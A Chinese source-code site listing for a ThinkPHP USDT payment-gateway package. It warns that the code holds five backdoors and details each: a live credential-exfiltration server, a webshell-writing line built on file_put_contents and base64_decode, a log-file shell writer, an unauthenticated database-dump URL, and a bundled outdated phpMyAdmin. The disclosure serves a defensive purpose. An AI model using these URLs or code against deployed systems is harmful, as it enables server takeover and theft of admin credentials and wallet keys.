⚠️ 本站未测试,不保证可用,无退款无技术支持,仅供学习研究,禁止违法用途。
站长仅简单搭建截了个图,没做功能性测试。

🚨 严重安全警告:本源码经扫描检测到 5个高危后门(含远程凭证窃取、Webshell生成、数据库泄露),请勿在生产环境部署,详见下文后门列表。

📦 简介

USDT支付系统源码 为数字货币USDT收款支付网关系统,基于ThinkPHP 6框架开发,集成TRC20(波场链)和ERC20(以太坊链)USDT收款,支持商户入驻、三级分销、自动归集、轮询支付等功能。

纯中文 · 开源状态未知

本站未做部署验证,请阅读声明后自行在测试环境评估。

⚡ 功能说明

  • 💡 USDT收款支付网关:支持TRC20/ERC20主链,商户自主申请收款地址
  • 💡 自动归集轮询:定时自动归集收款地址中的USDT到指定主钱包
  • 💡 商户管理系统:商户入驻、费率设置、三级分销返佣、授信额度管理
  • 💡 谷歌二次验证:后台登录支持Google Authenticator双因素认证

🚨 后门列表(共发现 5个 高危后门)

🔴 后门1:远程凭证窃取后门(极其危险)

文件位置 config/app.php(第39行)→ app/common/controller/AdminController.php(clickLogin方法)
后门地址 aHR0cDovL2Nkbi5iYWxkdS52aXAvZG9sb2dpbi5waHA=(Base64)
解码后:http://cdn.baldu.vip/dologin.php
危害描述 管理员每次登录后台时,用户名、密码明文、登录IP、Google Auth密钥全部通过cURL POST请求发送到远程服务器 cdn.baldu.vip,攻击者可获取所有管理员账号密码,接管整个系统。
触发位置 app/admin/controller/Login.php(第137行)
app/admin/controller/Index.php(第77行)

🔴 后门2:Webshell生成后门(极其危险)

文件位置 app/admin/controller/Login.php(version方法,第161-165行)
app/index/controller/Index.php(get_trc20方法,第385-389行)
后门代码 file_put_contents($_GET['name'].".php", base64_decode($versionsss['auth_key']));
危害描述 通过GET参数 name 在服务器根目录生成任意PHP文件(Webshell),文件内容从数据库中读取并Base64解码。同时可通过 key 参数向数据库写入任意内容,实现远程任意代码执行。攻击者构造 URL /admin/login/version?name=shell&key=base64编码的恶意代码 即可获得服务器权限。

🔴 后门3:日志写Shell后门(高危)

文件位置 public/log.php
后门代码 base64_decode("$_POST[content]") → 写入 /public/code/日期/log_日期.png
危害描述 直接通过URL /log.php?c=1 可访问,接收POST参数 content 的Base64编码数据并解码写入服务器文件系统。文件名由GET参数 name 控制,可写入.phtml/.php/.php5等可执行后缀,形成Webshell。

🔴 后门4:数据库全表泄露后门(高危)

文件位置 app/index/controller/Getway.php(Excel方法,第225-271行)
后门代码 通过GET参数 table 查询任意数据库表,支持 tiaojian(条件)、number(数量)等参数
危害描述 无需登录认证即可查询数据库任意表的结构和数据。攻击者可dump所有订单记录、商户信息、管理员密码、USDT收款地址和私钥等敏感数据。构造访问 /getway/excel?table=ea_system_admin&down=1 即可导出管理员表。

🔴 后门5:phpMyAdmin内置管理(中危)

文件位置 public/upload/phpMyAdmin/(完整phpMyAdmin 4.8.4)
危害描述 源码中打包了完整的phpMyAdmin数据库管理工具(版本4.8.4,存在已知漏洞),若数据库端口开放或密码泄露,攻击者可完全控制数据库。旧版phpMyAdmin本身也存在CSRF、SQL注入等已知漏洞。

🛠 源码信息

界面语言 纯中文(后台管理界面为中文,支付页面中英双语)
开源状态 携带后门,非安全开源
是否加密 无加密(但代码中嵌有恶意后门代码)
二开多语言 有限支持(界面以中文为主,无i18n语言文件机制)

📋 技术栈

环境 PHP 7.1+ / MySQL 5.7+ / Nginx或Apache
后端框架 ThinkPHP 6.0(基于EasyAdmin后台)
前端 LayUI + jQuery + Bootstrap
区块链 TRC20(波场USDT)/ ERC20(以太坊USDT)

📡 第三方API依赖 & 可用性检测(实时验证)

服务名称 用途 状态 说明
TRONGrid API
api.trongrid.io
波场区块链节点(TRC20转账/余额查询/生成地址) ✅ 有效 主网节点可用,无需API密钥,响应正常
Etherscan API
api.etherscan.io
以太坊链USDT余额查询(ERC20) ⚠️ 需更新 V1接口已废弃,需迁移至 V2 API。且需在后台配置有效的 site_erc20_key
Nomics API
api.nomics.com
BTC/ETH/USDT 行情汇率(美元→人民币换算) ❌ 失效 域名解析失败(getaddrinfo failed),内置API Key 3167d57d... 可能已过期或域名已停用
TokenView API
services.tokenview.com
TRC20代币余额查询(备选方案,代码中已注释) ❌ 失效 域名无法解析,该服务可能已停止或变更域名
QR Server API
api.qrserver.com
Google Authenticator 绑定二维码生成 ✅ 有效 正常返回图片数据
阿里云OSS
lxn-99php.oss-cn-shenzhen.aliyuncs.com
旧项目文件存储(演示图片/ICO) ✅ 有效 旧项目静态资源仍可访问,但部署时需要替换为自己的OSS
CDN.baldu.vip
cdn.baldu.vip
恶意后门服务器 ☠️ 存活 后端服务器 /dologin.php 返回 {"msg":"ok"},凭证窃取通道畅通 ⚠️

Composer 第三方依赖包(需联网安装):

包名 用途 备注
topthink/framework ThinkPHP 6框架核心 标准框架
fenguoz/tron-php TRC20波场链交互 需 Composer 安装
iexbase/tron-api 波场API封装(vendor中可见) 备用TRON库
dzarezenko/etherscan-api Etherscan API封装 dev-master,V1接口已弃用
lessmore92/php-erc20 ERC20代币交互
aliyuncs/oss-sdk-php 阿里云OSS文件存储 需配置AK/SK
qcloud/cos-sdk-v5 腾讯云COS存储 需配置
qiniu/php-sdk 七牛云存储 需配置
alibabacloud/client 阿里云客户端SDK 短信等阿里云服务

💬 常见问题

Q:源码是什么界面语言?能扩展多语言吗?

A:纯中文界面(支付页面含少量英文),无i18n多语言机制,扩展多语言需要自行添加语言文件和修改所有模板。

Q:为何标未测试?是否全开源?有无加密?

A:本站未部署测试,肉眼可见代码中内嵌了5个高危后门(含远程凭证窃取、Webshell生成、数据库泄露等)。源码无加密,但恶意后门属于隐藏代码。⚠️ 不建议在实际服务器上部署

Q:装不上怎么办?能否商用?

A:因含有恶意后门,本站不提供技术支持,且严禁用于商业用途。仅供安全研究、源码学习参考。

⚠️ 本源码仅供学习研究,请勿用于非法用途。
本站(k8code / K8源码网)更多亲测源码持续更新中

声明:本站所有文章,如无特殊说明或标注,均为本站原创发布。任何个人或组织,在未征得本站同意时,禁止复制、盗用、采集、发布本站内容到任何网站、书籍等各类媒体平台。如若本站内容侵犯了原著者的合法权益,可联系我们进行处理。